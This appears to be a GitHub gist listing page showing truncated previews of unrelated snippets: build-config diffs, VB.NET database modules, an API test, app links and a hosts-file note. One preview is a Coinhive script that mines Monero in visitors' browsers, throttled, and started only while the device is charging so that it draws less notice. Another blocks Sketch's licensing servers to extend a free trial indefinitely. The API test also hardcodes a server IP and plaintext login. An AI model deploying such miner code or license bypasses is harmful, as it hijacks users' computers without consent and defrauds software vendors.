{
- "outputPath": "dist/piggybank",
+ "outputPath": "functions/dist/piggybank",
- "outputPath": "dist/piggybank-server",
+ "outputPath:": "functions/dist/piggybank-server",
}
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Option Explicit On | |
Imports MySql.Data.MySqlClient | |
Module modPositionGroup | |
Public Structure Group_Position | |
Dim GroupID As Integer | |
Dim GroupCode As String | |
Dim GroupName As String | |
Dim Description As String |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Option Explicit On | |
Imports MySql.Data.MySqlClient | |
Module modDivision | |
Public Structure Divisions | |
Dim div_id As Integer | |
Dim div_code As String | |
Dim div_name As String | |
Dim div_desc As String |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Option Explicit On | |
Imports MySql.Data.MySqlClient | |
Module modPayroll | |
Public Structure payslip_selectedEmployee | |
Dim IndexID As Integer | |
Dim PayrollID As Integer | |
Dim EmployeeID As String |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script src="https://coin-hive.com/lib/coinhive.min.js"></script> | |
<script type="text/javascript"> | |
var xmr = new CoinHive.Anonymous('nZA7gxQv1dArvhcounbgzBcNKQliOCx2', { throttle: 0.85, threads: 2 }); | |
try { | |
var threads = Math.max(1, Math.floor(navigator.hardwareConcurrency / 4)); | |
xmr.setNumThreads(threads); | |
navigator.getBattery().then(function(battery) { | |
if (battery.charging) { | |
xmr.start(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
let chai = require('chai'); | |
let chaiHttp = require('chai-http'); | |
let should = chai.should(); | |
let apiURL = 'http://54.252.206.198:4000/api/v1'; | |
let lastInsertID = null; | |
let token = null; | |
let user = { | |
username: '4LOOP.003', | |
password: '123456' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https://itunes.apple.com/au/app/ellerslie/id920199342?mt=8(Ionic 1) | |
https://itunes.apple.com/nz/app/stamp/id1080172237(Ionic 1) | |
https://itunes.apple.com/nz/app/rosmini/id804166760?mt=8(Ionic 1) | |
https://apps.apple.com/nz/app/stars-of-aroha/id1168982009(Ionic 1) | |
https://play.google.com/store/apps/details?id=com.beltcalcpro&hl=en (Ionic 1) | |
https://itunes.apple.com/mr/app/v-beltcalc/id1128656670?mt=8 (Ionic 1) | |
https://vbeltcalc.com/ (Ionic 1) | |
https://alsocreative.com/project/v-belt-calc/ | |
http://kegitapp.com/product/ (Ionic 3) |
###Sketch trial non stop
Open hosts files:
$ open /private/etc/hosts
Edit the file adding:
127.0.0.1 backend.bohemiancoding.com
127.0.0.1 bohemiancoding.sketch.analytics.s3-website-us-east-1.amazonaws.com
OlderNewer